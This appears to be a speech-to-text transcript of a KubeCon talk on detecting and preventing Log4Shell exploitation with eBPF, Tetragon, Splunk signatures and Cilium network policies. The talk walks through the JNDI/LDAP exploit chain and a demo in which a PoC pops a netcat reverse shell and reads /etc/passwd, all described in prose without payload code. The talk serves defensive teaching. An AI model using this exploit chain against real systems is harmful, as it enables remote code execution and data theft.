 Hello, everyone, and then welcome to the last day of KubeCon. And thank you for coming. Today, we will talk about the next look for Shell, and then how can we prepare for these CVs with the help of EVPF. So who is speaking today? My name is Natalia Ivanko. I'm a security product lead at Isovalent. And here is with me, Joan, who is a staff engineer and then a serial maintainer at Isovalent. So a little bit about the agenda. So we will start with a motivation like a quick recap, like what is look for Shell just in a one-on-one because I'm not a Java developer, so I cannot really go in very details. And then we will see like why EVPF would be the optimal solution to detect that. We will see an open source tool on Tetragon, and then we will dive into how this solution would pick up look for Shell, and then we will show a demo. And then I will finish with some further detection and then prevention techniques, like how could we do detect the next look for Shell? Because there will be many more coming. So let's start with a quick one-on-one. So what is look for Shell? It's actually a vulnerability in a Java logging library, which is licensed by Apache 2, and then it allows remote code execution. So basically the attacker who could control the log messages that are going into an application, and then is vulnerable, the attacker would be able to execute arbitrarily code loaded. And then of course it affects wide range of products, servers, and vendors. So why is it happening? Why this vulnerability actually exists? So it's actually due to three features, bugs, whatever you want to call it, and then two of them is in actually look for J, and then the third is actually Java feature. So the first one is the look for J library allows you to log messages from sources that you actually don't control. So for example, if you're receiving data in your application, it allows you to look for example, user names, passwords, or error codes, return codes, and so on. The second one is it also allows you to look for example, environment variables. So if you do like dollar sign, curl base, Java version, curl base, it will of course log the Java version. You could do for example, OS version, and then it would actually log the OS version. And then what's interesting that it allows you to do that recursively. So if the Java version actually, that string contains under dollar sign, curl base, something something curl base, it will actually resolve that and log that as well. And then the third one, the GNDA feature, it's actually a Java feature. So what it does, it allows you to look up information on other servers. So for example, you could do like DNS lookups, you could do like LDAP lookups, and then you can actually put like an LDAP server others, and then basically what look for J will do, it will connect to that server, look up that information, basically return back, and then basically look what was looked up. And then what's interesting, that you can actually return with a Java object. So for example, if that information on the LDAP server was actually a Java object, basically look for J will return with a Java object, and then it will happily run. So for example, if I'm like a crafty individual, I can like set up my LDAP server, put my Java object file there, and then send that string to vulnerable look for J application. So what would happen then? So let's say I'm an attacker, I figure out that there is like vulnerable web application, which is exposed to the internet, it has a static IP, it's exposed by a load balancer, and then it's running a look of vulnerable look for J version. Let's say I set up my LDAP server, put my malicious Java cluster, and then I also have an under server with a netcat listener. So let's say I send the malicious string to that vulnerable application. So what look for J will do, it will parse that string, resolve the IP address, and connect to the LDAP server. And then it will of course return, and then if I put a malicious Java cluster, it will actually return with the Java class. The web application with look for J, of course will execute that Java class, and then basically run the code that I actually put in the Java class file. And then for example, if it was a reverse, it will of course connect to my other machine, and then run that reverse. And then basically after that, I can do basically whatever I want. So why is it so powerful? So it's like very easy to exploit. Like you can just parse that string to an application with your domain that you actually set up. And then basically you can run like arbitrary code. So I'm not a Java developer, but when I was talking to my friends, it's basically almost everywhere. So if you are using Java, probably you are going to use that low end library. And then yeah, let me know if I missed anything. So what can detection and the response team can do like in this case, or for example, security teams? Of course, they would need to identify and then patch these systems, but it will take a very long time. And then until that patching is completed, they would need to answer questions like, how can we detect that actually the software is unpatched? Or for example, if it's unpatched, like how can we make sure that our Kubernetes workloads and then servers are running safe? And then if they are not safe, like how can we detect if we have been compromised? So to be able to do that, we would need like a low overhead and real-time solution which would provide observability into our Kubernetes workloads. And then it needs to be dynamic. So that's where basically EBPF comes into the picture. Great. Hi, good morning. So I have about 10 or 15 minutes and I'm gonna try to convince you that BPF is the right technology for this problem. And then hopefully I can convince you of that here very quickly. And then we'll look about how to build up the right infrastructure to detect these kinds of CVEs in your cluster, all right? So first, I guess if you don't know what BPF is, there's been a few talks about it, but I'd give you just like the quick, high-level overview, right? What does it do? Primarily we can extend the Linux kernel, right? So previously before we had BPF, if you were a kernel developer like myself, what you had to do is write some kernel code, submit it to the kernel community, get that patch in, and then you had to wait a long time, right? Because that code has to get upstream and then it has to get into the vendor and then your vendor might take a couple years and then by the time your patch is there doing the stuff you want to do, it's unlikely many people care anymore and you might be off doing something else. So BPF gives you that ability to write some C code. It has some restraints, of course, because it needs to be safe when it's put into the kernel. The kernel can't crash or can't run your code forever and forget about the rest of the jobs that are on the scheduler and so on. But the BPF core will ensure those properties for you. You write your little C program and you load it into the kernel and you've basically extended the kernel at this point. What's nice is you can hook almost anywhere in the kernel. Most functions in the kernel can be hooked. If you're in the networking space, we have some performant hooks. If you're in the security space, we have some LSM hooks, which are security hooks at sort of well-known security checkpoints in the kernel. So that's BPF in a nutshell. The other two nice properties for this particular problem that we're looking at are it's minimally invasive, meaning it's fairly performant. It's basically taking an extra function call when you're in the kernel. So you can imagine the TCP stack with everything it's doing. One extra function call is gonna be minimally noticeable. And then the other thing is it's dynamic. And this is quite useful when you have big clusters, mini clusters maybe. Maybe you have 10,000 plus nodes and you wanna roll out an update to your BPF program to recognize a new CVE. So you can do this. And then you can swap the BPF programs on the fly without having to reboot your nodes. Sometimes without even having to restart any pod, your sort of management pod, and definitely without having to restart the pods that are your workloads. So everything keeps running and you have a seamless sort of update. So that's my BPF pitch. What are some questions that our observability platform would like to ask? So we can say what binaries are running in our system and your system in this context can be your Kubernetes cluster, your virtual machines, your bare metal. If you're building up this observability platform, you wanna know everything that's run in that cluster. This will let you know if things are being run that aren't expected. You wanna know what versions are being run, right? And not just the versions of the binaries, you wanna know the versions of the libraries too, right? Because we know an old, like a Docker pod, I'm sorry, a Kubernetes pod or something might be linking against an old version of OpenSSL. I wanna know that. I wanna make sure that my libraries are patching up to date. I wanna know all the network connections, right? Imagine a pod spins up. It's running happily for, I don't know, an hour or two and then all of a sudden it starts doing a remote connection out to some S3 buckets or something, right? You might wanna know that. It sounds a little suspicious. TLS compliance is another big one that we see a lot. I wanna know all of the TLS. If TLS is being used, if IBsec is being used, WireGuard, whatever, I wanna get those encryption policies in place and I wanna make sure I can observe them at runtime and make some guarantees. So here's a list of things. And of course if you're someone who writes this software, you're gonna, customers will probably tell you I wanna do it in real time or close to real time with microseconds and millisecond time bounds. I don't want you to use very much CPU and I really don't like you to use a whole lot of memory either. Of course if you're running a cluster, then you're on the other end of that and you're telling the folks like me, please don't use too much CPU, please don't use too much memory and please feed my pipeline in close to real time. So we have these constraints and a bunch of questions we'd like to ask. Due to limited time, we're not gonna go through every one of these. So I highlighted a few, we're gonna walk through, but then Natalia will be able to show you in the demo here. Namely, what's running, what libraries are included, what network connections we're doing and any file access. Read, write, open. Let's give this a good sort of baseline framework to build an observability platform. We're gonna base this off a tetragon. A tetragon is under the Cilium umbrella of projects. It's the runtime, observability and security piece. I'm the maintainer. One of the maintainers at least, there's a whole bunch of people that work on this. A few of them at Isovalent, a few of them not at Isovalent. It's an open source project. If you go to a GitHub slash Cilium, it'll be under that umbrella. Basically what it does is it gives you a framework to start hooking into the kernel at all these various access points. And then it gives you a mechanism to pull those out of the kernel. Once they've been filtered in the kernel, which is important because you're gonna see in a couple minutes that you could get a lot of data out of the kernel here if you wanted to. And then also aggregated so that we get sort of smart metrics. We're not just dumping everything that the kernel ever does up to user space. We're collecting kind of heuristics, histograms, stats about the kernel and then exporting what we want that's useful for us out to the agent. And then the agent then can interact with the world. So you have Prometheus metrics, logs, JSON logs, gRPC, a whole series of ways you can get this data off the system depending on what sort of backends you're running. So let's dive in. First thing, we wanna have some executable tracing. Wanna see every process that runs in the system. Tetragon provides that. It'll throw up a JSON event when something gets executed. What you can see on the right there is some sort of a mockup of what you might build from this. An execution tree. You see Java, we see a lot of Java applications and they're sort of interesting in the ways that they execute lots of children and how JVM works and stuff. So you wanna trace all of that. And you can see on the left is basically an example of what a JSON output might include. I sort of slimmed this down. Tetragon has the ability to sort of blow that structure up or shrink it down based on what information you're using. In this case, an exec ID is interesting because it gives you a unique ID for an executable in a system. So anywhere in my cluster, I wanna have a unique ID for that specific executable. You might have a shot 256. Binary names are not particularly secure. It's quite nice to say this is the digest of this binary that executed. PID, you see a lot of useful things in Linux here. There's a bunch of pod information that you can include. The container, the runtime, the namespace, all of your normal Kubernetes metadata. And sort of interesting from this talk, for this talk is you also have the time stamp. So you can then push this into a database and now you have what executed a unique ID for it in a time which allows you to build a time series database. And so you can go back and forth in time and say what executed a month ago, what executed five minutes ago. You can do sort of more complex things like diffing the two. I wanna see what my pod ran yesterday. I wanna see what my pod ran today. Maybe that's the empty set. Or maybe there's some extra stuff in there that you should be paying attention to. On this little flower picture here, it's just taking that mock up, pulling in some real data from one of our test clusters and kind of zooming out. And basically what you see is every executable in our cluster on a graph. It looks good. If you were to zoom in, and to each one of those clusters there's actually a pod. You can imagine pod executables are all related to each other. And you can see their names and all their stuff in there if you were to click on them. It's a fun picture for a talk. The next thing here, so we have executable traces now. And I have five minutes, so that's good. Let's go with the next thing we wanna know about libraries, right? I wanna know what I'm pulling in. And so here's an example. Again, you get the exec ID, which gives you back to the original parent of the, sorry, the original process, right? And you can say, this process has these libraries associated with it. I know by the shaw that this library is one of my good libraries. I know by the shaw that this is one of my unpatched libraries. Again, it's a timestamp, so I can go forward and backwards in time and say, is this library patched? Is this library not patched? I know this is the digest of my patch library. I know this is the digest of my unpatched library. Let me go and look in my runtime and see if I have anything running that is using an unpatched library, right? And when we think about how we pull this data out, right? So that's just the raw, the last slide was the raw. Jason, we look at how we pull that out. There's a couple of ways to do that. You can put it in a database. You can do queries over it, SQL queries. The bottom is an example of a Splunk query. If you've kind of done Splunk before that should look familiar, you're giving yourself fields and names and doing a query over a database. If database, you don't want to store so much data, we can compress that down and that's what the metrics are at the top, right? It's just the binary name and the namespace. In this particular example, there was something that was running on the host, so it doesn't have a pod, but if it was running in a pod, it would, pod name and namespace would be there. So we think about this now. We have everything that's executed. We have all of the libraries. We have a good sense of what our network is doing. The next thing to sort of ask in this context is what are we connecting to, right? Like what are the network connections in the system? And that's what the network connectivity observability does and we can monitor, connect, listens and accepts. What's interesting about this from a Tetragon standpoint versus I say a middle box or something running in the actual networking data path is it's done at the socket level. So we see sockets and we're not intercepting packets. That has some advantages, especially when you think about listening sockets. You can imagine something opens a listening port. If you're in the actual data path, you wouldn't know about that till it actually packet was received or sent, right? With something like Tetragon where you're monitoring the runtime at the socket level, you can say just give me a list of everything that's listening in my cluster, right? And maybe that thing that's listening hasn't actually even been talked to yet, right? So there's no actual data on the thing. There's just a socket in your system. The last next piece here we have is file integrity monitoring. We call it FIM. This is the idea that now I know executables, I know my libraries, I know my network connections. Next thing I want to know is my files. What am I opening? What am I reading? What am I writing? This one is particularly interesting because when you build a system and maybe your first attempt at this would be let me just monitor all of the sys open, sys writes, sys reads or something like this. And you'll quickly realize that a Linux system does a lot of stuff with files, right? Everything is a file. Open, close, read, write. And you'll very quickly spam your backend most likely. Depending on what you have in that pipeline, but your SIM, it's gonna get a lot of file data. So one of the nice things about Tetragon then is you can build these filters in what you see here on the bottom. There's a lot of different ways to do those. We have equality tests, substrings and so on. But the basic idea is you can say I wanna only monitor files in this directory or I wanna monitor just a specific file and for a specific operation maybe just writes. I don't care if you read it. Etsy password for example is maybe an example of this where lots and lots of stuff will read Etsy password, right? Probably very few things should be writing to Etsy password. SSH keys are another example, right? If your pods are writing to SSH keys, maybe that's not expected. Host file system for example is another one on a pod. Maybe it's okay to read the host file system but you probably don't want your pods to be writing to the host file system. And those are the kind of policies you can put in Tetragon. The thing get loaded down into the kernel so that we get this low overhead property, right? And we also use less memory in the data stream because we're compressing only two events that you really, really care about. Finally the last piece I wanna mention is we can enforce things in Tetragon. This allows you to say I wanna, when I see this particular event, maybe it's that write to Etsy password, I wanna stop the action, kill the process, freeze the pod. This allows an operator to come back later and figure it out. The key for Tetragon's point of view is that it's done in line with the kernel. So the event happens while the call is being made into the kernel. We block that call and stop it from running in the kernel and then go back into the action. This way versus a model where we just generate the event and we're to do it from user space. If you're write to Etsy password, we wanna make sure that that write doesn't actually happen versus sort of an async system where you would see the write could happen and then you could stop the pod which would be kinda after the action happened. Just to go back to sort of a little bit performance, this is a benchmark that we have in the repo so you can run it if you'd like. The time doesn't particularly matter but basically what we're showing is that let's compile the kernel a whole bunch which is interesting as a stress test because you're gonna create a lot of files, open and close a lot of files, you're gonna execute a lot of things. And basically what you can see there is for if you do proper, the top one is just the base system doing all the library loads and executables. You can see very, you know, less than 5% overhead. If you do a syscall monitoring, less than 10% overhead. And that 23% is what I said probably don't want to do. That's a good example of something that may not be good is if you monitor every file read and write in a system. So that's sort of like the worst case thing. We don't actually use that policy in production but it sort of highlights the need to do in kernel filtering and in kernel aggregation. Okay, so these are the things we've talked about. Right here, I'm not gonna go through them again but it's a nice summary. And then Natalia's gonna walk you through this workflow here to determine if we've been exploited and use Tetragram to detect that. Go ahead. Cool, so let's dive into a quick demo. I will be very quick because we don't have so much time. So for like a test environment, I'm going to use like a GK cluster, very easy. It has one node, it's Ubuntu 22.04.1 LTS. It's running a 5.15 kernel version on that road. Tetragram is running actually as a demon set and I have the vulnerable web application as a pod like Java web app pod. And then it's running on the tenant jobs namespace. So I also have the LDAP server where I put the malicious Java class file and the netcat listener on that same node. So what we will see, we will see the exploitation of the web application. So I'm just gonna send a well-crafted string and then basically look for JBL parts that and then the Java class file will execute actually a reversal that the netcat listener is going to pick up. And then from that reversal, I'm just trying to list some environmental variables and then it's sensitive flies. So this is how it looks like. Tetragram can run of course in a multiple node cluster. Right now I'm just using like one node and then it's running as a demon set. And then as we mentioned, we are observing like a process execution, network connections, and then sensitive flies. So all these events are actually exported like as a JSON events and then it contains for example, Kubernetes identity of our metadata, the process visibility information, network connection information, DNS server metadata. And then for further investigation, you could actually import that to a CM system like Elasticsearch, Flapsplank, or S3 for later incident investigation or for quick demos, you can actually use our CLI which actually parses these events. So this is how it looks like. I have the Java web app pod on the tenant jobs namespace. It has like an external IP that I can open from the browser. And then I have the LDAP server and then the netcat listener. So let me just switch to the terminal very quickly. So I can actually see if the Java web app pod is running. We see that it's up and running. And then I can actually open it from the browser. So this is how it looks like. And then this is on the bottom terminal. And then I can actually set up the LDAP server on the top. So let me just do that. So let's take a moment to appreciate like what's actually written here. I actually set up the LDAP server and then I created the malicious Java class file and then I put that on the server. And then it actually created a string that I actually can paste into the browser and then which will trigger the exploit. So I took this POC from a GitHub repository. It's Cosmarylog for a shell POC. Very good for like testing purposes. So let me just start the netcat listener on the middle. And then let me just start to observe the events from Tetragon. All right, let me just paste a string. And then I can say like welcome to Amsterdam. Click on login. All right, so what we can see here on the top, I clicked twice on the login. So we will see the execution twice. So it actually connected to the LDAP server. We can see that the execution was successful. It returned with 200. We can see that the exploit.class was actually downloaded. We can see the connection that was received on the netcat listener. So this is actually the reversal that was executed by the Java class file. And now let's take a look at the Tetragon events. So what we can see here is actually the connect event. We can actually see that there was a connection from the Java web app pod on the Tenon Jobs namespace. It reached out to the LDAP server and then what's interesting, we on the close event, we actually do statistics. So we can see that there was 1,600 bytes downloaded, which is actually the Java class file. We can also see the Kubernetes identity of information. So we have an idea like where this external connection was coming from. And then what's also interesting, this is the BNSH, the reversal, the shell execution. So we could pick that up as well. So let me just list some environment variables. So we can actually see that we are inside the Java web app pod. And then we can see the process execution as well as the exit event. And I can just read like AC password as an example. And then we could see, for example, that there was an execution event and then an exit event and then open and close event on AC password. All right. Let me just go back. Great. So how, for example, a security team could use that like in a real world scenario. So you could explore those JSON events into a CM system and then you could create signatures. For example, late process execution. So you would know, for example, like no external connection should have reached out from the Java application, five minutes after the container has started, that's super malicious. Or for example, there should be no shell execution or the Java application should have never shelled out five minutes after the container started. So two quick examples. I will show a dashboard later on. So this is, for example, a Splunk signature for late process execution. So this would pick up, for example, the external reach out from the Java application and actually the shell as well. And then this is the Splunk vary for shell execution. This would, for example, pick up like my just keep cataract sec. So for example, if you have a workload and then you keep cataract sec into it or someone else in your team, that's also something that we should consider. All right. So actually I prepared a dashboard. So what we can see here on the top like there is a Java web app container started and then five minutes later, there was just like an external reach out which downloaded 1,000 and then 600 bytes. And then if we take a look at and start to investigate, we see like, okay, this was the Java web app pod from the tenant jobs namespace. And then we can see like, okay, it was the GRI bin Java binary as a parent process. And then we can see that, okay, it's actually executed a shell. And then on the bottom, we can actually see like what other processes were executed by the shell. Like, okay, there was an Etsy password deed and there was for example of write or we can see like there was some listing to the existing directories. And then as a last step for like prevention, we should apply least privilege principle for network connection. So allow only the network connections that your application needs and basically no more. So for this, we would take advantage of the Celium network policies and basically two features. The first is the DNS-based policies which kind of allows traffic based on DNS names instead of like IPs and ciders. So you can say like, my application should communicate to only api.twitter.com and then nothing else. And then the second feature is basically deny policies. It's also like a Celium network place feature which defines a set of destinations that will be denied by allows other network traffic. And then we can take advantage of the word concept which defines like host on the internet. So there is a quick example like how could we prevent this? So the first Celium network places actually allows connections only to api.twitter.com and then the second deny policy is actually deny connections to everything else. All right, so we are still on time and wrapping up. So what did we see today? We see like a very quick intro to look for Shell as a one-on-one. We see like why eBPF would be the optimal solution for it. I think John covered it pretty clearly. We saw a quick demo like how could we pick that up with like an existing open source tools like Tetragon. And then we see like, for example, further detection and then prevention techniques like the late process execution or the shell execution in Splunk and then the prevention with network policies. Yeah, so if you're interested, like how to contribute? Yeah. Yeah, you're on the go. So go to the GitHub repository, join Slack, use the tool, report bugs, create feature requests, add your use cases, improve documentation. Yeah, we have like a lot of work across the layers of the stack. So it's not only eBPF code you can contribute regarding to Google code, Kubernetes, documentation, packaging, and so on. Yeah, and then we still have some time. So I would open it for Q and the end. Yeah, thank you for coming. I think there's a question in the front here. If there's a mic anywhere. Hi, thank you for your presentation. I have a question with a couple of colleagues. We are currently trying a alpha feature of Kubernetes which is called the snapshot team. So you can basically a snapshot or you can take like a picture of the current state of your container, you have the RAM, et cetera. Here Tetragon is more for runtime. Can we imagine use Tetragon for forensic analysis or post-mortem forensic analysis? Yeah, so I think there's a couple of efforts in this place that I know about. There's a group of folks that are working on doing it and plugging it into like their GitHub actions where they run the pod and they get a snapshot of like events you want to have. So like you wanna know what do I connect to, what files open, what executes. So they basically build a trace from that and once you have the trace you can basically take that trace and build a policy, kind of automate a policy from that and then enforce it, right? So that's one approach. I know some people are working on now kind of in the S-bomb kind of space, very similar to an S-bomb, but then enforced. And then there's another idea that people are thinking about right now is like if we publish well-known images like IngenX or SQL or whatever, pick your favorite thing. We could ship that with what we know it does, right? Like some things we just understand well enough to say these things are what execute because that's what we put in the entry point, you know? And so you could build that policy just as part of the image and package them together and then when it gets deployed you would automatically apply the policy behind it or probably in front of it actually so you don't have a race and then you would get this kind of property that you're looking for sort of known image along with known policy that restricts it. Yeah, good. Is there another question? Phil? Thank you, thank you. Yeah, perfect. I'm looking into the light, so are there any other questions? I'll take a couple of steps back, I can see better. If not, come find us. I mean, we'll be around today. I'm either at the Sillian booth or the I-surveillance booth or if you want to just come on up and chat with us for a little bit, we'll be around for a little while. Thank you. Yeah, thanks a lot.